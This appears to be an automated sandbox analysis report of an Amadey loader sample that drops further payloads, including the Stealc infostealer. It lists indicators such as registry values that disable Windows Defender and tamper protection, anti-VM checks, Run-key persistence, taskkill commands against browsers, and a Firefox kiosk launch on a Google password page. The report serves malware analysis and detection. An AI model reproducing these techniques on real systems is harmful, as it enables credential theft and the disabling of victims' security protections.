amadey | ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	dd94fa9303.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	dd94fa9303.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	dd94fa9303.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	dd94fa9303.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	dd94fa9303.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	dd94fa9303.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0tClIDb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	78c83a40ec.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2427caf3c8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dd94fa9303.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0tClIDb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	78c83a40ec.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2427caf3c8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dd94fa9303.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2427caf3c8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dd94fa9303.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0tClIDb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	78c83a40ec.exe

Executes dropped EXE 11 IoCs

pid	Process
2756	skotes.exe
1792	B3vKvPi.exe
904	callmobile.exe
4900	0tClIDb.exe
2068	wTMEVe8.exe
1964	ntRoEwh.exe
1592	callmobile.exe
1152	78c83a40ec.exe
3396	2427caf3c8.exe
1984	8b0d03025f.exe
684	dd94fa9303.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	0tClIDb.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	78c83a40ec.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	2427caf3c8.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	dd94fa9303.exe

Loads dropped DLL 23 IoCs

pid	Process
3064	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
3064	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
2756	skotes.exe
2756	skotes.exe
2756	skotes.exe
2756	skotes.exe
2756	skotes.exe
2756	skotes.exe
2756	skotes.exe
2756	skotes.exe
2756	skotes.exe
2756	skotes.exe
2756	skotes.exe
2164	WerFault.exe
2164	WerFault.exe
2164	WerFault.exe
2164	WerFault.exe
2164	WerFault.exe
2532	WerFault.exe
2532	WerFault.exe
2532	WerFault.exe
2532	WerFault.exe
2532	WerFault.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	dd94fa9303.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	dd94fa9303.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	B3vKvPi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	ntRoEwh.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\78c83a40ec.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013244001\\78c83a40ec.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\2427caf3c8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013245001\\2427caf3c8.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\8b0d03025f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013246001\\8b0d03025f.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\dd94fa9303.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013247001\\dd94fa9303.exe"	skotes.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00050000000186f2-2508.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
3064	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
2756	skotes.exe
4900	0tClIDb.exe
1152	78c83a40ec.exe
3396	2427caf3c8.exe
684	dd94fa9303.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4920	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2164	904	WerFault.exe	34
2532	1592	WerFault.exe	40

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8b0d03025f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	78c83a40ec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	callmobile.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	8b0d03025f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0tClIDb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	8b0d03025f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dd94fa9303.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	callmobile.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2427caf3c8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
3128	taskkill.exe
3676	taskkill.exe
4108	taskkill.exe
4624	taskkill.exe
1288	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
3064	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
2756	skotes.exe
4900	0tClIDb.exe
1152	78c83a40ec.exe
3396	2427caf3c8.exe
1984	8b0d03025f.exe
684	dd94fa9303.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
4920	powershell.exe
684	dd94fa9303.exe
684	dd94fa9303.exe
904	callmobile.exe
1592	callmobile.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	904	callmobile.exe
Token: SeDebugPrivilege	1592	callmobile.exe
Token: SeDebugPrivilege	3128	taskkill.exe
Token: SeDebugPrivilege	3676	taskkill.exe
Token: SeDebugPrivilege	4108	taskkill.exe
Token: SeDebugPrivilege	4624	taskkill.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	1864	firefox.exe
Token: SeDebugPrivilege	1864	firefox.exe
Token: SeDebugPrivilege	4920	powershell.exe
Token: SeDebugPrivilege	684	dd94fa9303.exe
Token: SeDebugPrivilege	904	callmobile.exe
Token: SeDebugPrivilege	1592	callmobile.exe

Suspicious use of FindShellTrayWindow 15 IoCs

pid	Process
3064	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1864	firefox.exe
1864	firefox.exe
1864	firefox.exe
1864	firefox.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1864	firefox.exe
1864	firefox.exe
1864	firefox.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe
1984	8b0d03025f.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3064 wrote to memory of 2756	3064	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe	30
PID 3064 wrote to memory of 2756	3064	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe	30
PID 3064 wrote to memory of 2756	3064	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe	30
PID 3064 wrote to memory of 2756	3064	ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe	30
PID 2756 wrote to memory of 1792	2756	skotes.exe	33
PID 2756 wrote to memory of 1792	2756	skotes.exe	33
PID 2756 wrote to memory of 1792	2756	skotes.exe	33
PID 2756 wrote to memory of 1792	2756	skotes.exe	33
PID 1792 wrote to memory of 904	1792	B3vKvPi.exe	34
PID 1792 wrote to memory of 904	1792	B3vKvPi.exe	34
PID 1792 wrote to memory of 904	1792	B3vKvPi.exe	34
PID 1792 wrote to memory of 904	1792	B3vKvPi.exe	34
PID 2756 wrote to memory of 4900	2756	skotes.exe	35
PID 2756 wrote to memory of 4900	2756	skotes.exe	35
PID 2756 wrote to memory of 4900	2756	skotes.exe	35
PID 2756 wrote to memory of 4900	2756	skotes.exe	35
PID 2756 wrote to memory of 2068	2756	skotes.exe	37
PID 2756 wrote to memory of 2068	2756	skotes.exe	37
PID 2756 wrote to memory of 2068	2756	skotes.exe	37
PID 2756 wrote to memory of 2068	2756	skotes.exe	37
PID 2756 wrote to memory of 1964	2756	skotes.exe	39
PID 2756 wrote to memory of 1964	2756	skotes.exe	39
PID 2756 wrote to memory of 1964	2756	skotes.exe	39
PID 2756 wrote to memory of 1964	2756	skotes.exe	39
PID 1964 wrote to memory of 1592	1964	ntRoEwh.exe	40
PID 1964 wrote to memory of 1592	1964	ntRoEwh.exe	40
PID 1964 wrote to memory of 1592	1964	ntRoEwh.exe	40
PID 1964 wrote to memory of 1592	1964	ntRoEwh.exe	40
PID 2756 wrote to memory of 1152	2756	skotes.exe	41
PID 2756 wrote to memory of 1152	2756	skotes.exe	41
PID 2756 wrote to memory of 1152	2756	skotes.exe	41
PID 2756 wrote to memory of 1152	2756	skotes.exe	41
PID 2756 wrote to memory of 3396	2756	skotes.exe	42
PID 2756 wrote to memory of 3396	2756	skotes.exe	42
PID 2756 wrote to memory of 3396	2756	skotes.exe	42
PID 2756 wrote to memory of 3396	2756	skotes.exe	42
PID 2756 wrote to memory of 1984	2756	skotes.exe	43
PID 2756 wrote to memory of 1984	2756	skotes.exe	43
PID 2756 wrote to memory of 1984	2756	skotes.exe	43
PID 2756 wrote to memory of 1984	2756	skotes.exe	43
PID 1984 wrote to memory of 3128	1984	8b0d03025f.exe	44
PID 1984 wrote to memory of 3128	1984	8b0d03025f.exe	44
PID 1984 wrote to memory of 3128	1984	8b0d03025f.exe	44
PID 1984 wrote to memory of 3128	1984	8b0d03025f.exe	44
PID 1984 wrote to memory of 3676	1984	8b0d03025f.exe	46
PID 1984 wrote to memory of 3676	1984	8b0d03025f.exe	46
PID 1984 wrote to memory of 3676	1984	8b0d03025f.exe	46
PID 1984 wrote to memory of 3676	1984	8b0d03025f.exe	46
PID 1984 wrote to memory of 4108	1984	8b0d03025f.exe	48
PID 1984 wrote to memory of 4108	1984	8b0d03025f.exe	48
PID 1984 wrote to memory of 4108	1984	8b0d03025f.exe	48
PID 1984 wrote to memory of 4108	1984	8b0d03025f.exe	48
PID 1984 wrote to memory of 4624	1984	8b0d03025f.exe	50
PID 1984 wrote to memory of 4624	1984	8b0d03025f.exe	50
PID 1984 wrote to memory of 4624	1984	8b0d03025f.exe	50
PID 1984 wrote to memory of 4624	1984	8b0d03025f.exe	50
PID 1984 wrote to memory of 1288	1984	8b0d03025f.exe	52
PID 1984 wrote to memory of 1288	1984	8b0d03025f.exe	52
PID 1984 wrote to memory of 1288	1984	8b0d03025f.exe	52
PID 1984 wrote to memory of 1288	1984	8b0d03025f.exe	52
PID 1984 wrote to memory of 2112	1984	8b0d03025f.exe	54
PID 1984 wrote to memory of 2112	1984	8b0d03025f.exe	54
PID 1984 wrote to memory of 2112	1984	8b0d03025f.exe	54
PID 1984 wrote to memory of 2112	1984	8b0d03025f.exe	54

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
"C:\Users\Admin\AppData\Local\Temp\ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3064
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Users\Admin\AppData\Local\Temp\1013210001\B3vKvPi.exe
    "C:\Users\Admin\AppData\Local\Temp\1013210001\B3vKvPi.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:1792
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\callmobile.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\callmobile.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:904
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 904 -s 616
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2164
- - C:\Users\Admin\AppData\Local\Temp\1013229001\0tClIDb.exe
    "C:\Users\Admin\AppData\Local\Temp\1013229001\0tClIDb.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4900
- - C:\Users\Admin\AppData\Local\Temp\1013238001\wTMEVe8.exe
    "C:\Users\Admin\AppData\Local\Temp\1013238001\wTMEVe8.exe"
    3⤵
    - Executes dropped EXE
    PID:2068
- - C:\Users\Admin\AppData\Local\Temp\1013239001\ntRoEwh.exe
    "C:\Users\Admin\AppData\Local\Temp\1013239001\ntRoEwh.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:1964
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callmobile.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callmobile.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1592
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 616
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2532
- - C:\Users\Admin\AppData\Local\Temp\1013244001\78c83a40ec.exe
    "C:\Users\Admin\AppData\Local\Temp\1013244001\78c83a40ec.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1152
- - C:\Users\Admin\AppData\Local\Temp\1013245001\2427caf3c8.exe
    "C:\Users\Admin\AppData\Local\Temp\1013245001\2427caf3c8.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3396
- - C:\Users\Admin\AppData\Local\Temp\1013246001\8b0d03025f.exe
    "C:\Users\Admin\AppData\Local\Temp\1013246001\8b0d03025f.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3128
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3676
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4108
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4624
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1288
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:2112
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1864
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.0.625787387\785017775" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1148 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {43c1f451-3d88-4d13-bc6e-5b254a4b4fa3} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 1280 110cd858 gpu
        6⤵
        
        PID:3316
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.1.1882327981\1688474253" -parentBuildID 20221007134813 -prefsHandle 1468 -prefMapHandle 1464 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b727aff5-c87e-4bdf-8c4d-afba28885480} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 1480 f9f9258 socket
        6⤵
        
        PID:3664
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.2.1325577127\298489421" -childID 1 -isForBrowser -prefsHandle 1932 -prefMapHandle 1924 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fc3d986-3753-483f-b035-36ccd3007353} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 2044 19cb4258 tab
        6⤵
        
        PID:2820
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.3.561170250\294802173" -childID 2 -isForBrowser -prefsHandle 2912 -prefMapHandle 2908 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {264e13ab-a1fc-4b9e-8126-4d21a4b8208e} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 2924 e62758 tab
        6⤵
        
        PID:4528
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.4.1027251155\693535121" -childID 3 -isForBrowser -prefsHandle 3732 -prefMapHandle 3736 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {44397423-8b64-4184-beec-32b36990a936} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 3380 1cdb0358 tab
        6⤵
        
        PID:1524
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.5.790233875\2115098238" -childID 4 -isForBrowser -prefsHandle 3840 -prefMapHandle 3844 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {88068e53-bb73-4586-921c-84cdef532381} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 3828 204c6b58 tab
        6⤵
        
        PID:2576
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.6.551785299\404286569" -childID 5 -isForBrowser -prefsHandle 4008 -prefMapHandle 4012 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90d84606-e499-4f64-99d3-bcddeda0ed18} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 3996 204c6258 tab
        6⤵
        
        PID:272
- - C:\Users\Admin\AppData\Local\Temp\1013247001\dd94fa9303.exe
    "C:\Users\Admin\AppData\Local\Temp\1013247001\dd94fa9303.exe"
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Windows security modification
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:684
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1013248041\KeaEfrP.ps1"
    3⤵
